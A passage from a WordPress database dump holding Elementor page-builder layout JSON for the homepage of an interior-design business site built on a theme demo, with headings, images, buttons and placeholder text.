elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3264,4772,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3265,4772,'_elementor_pro_version','3.8.1'),(3266,4772,'_elementor_css','a:6:{s:4:\"time\";i:1685011164;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3267,4773,'_wp_page_template','elementor_header_footer'),(3268,4773,'_elementor_edit_mode','builder'),(3269,4773,'_elementor_template_type','wp-page'),(3270,4773,'_elementor_version','3.8.1'),(3271,4773,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\"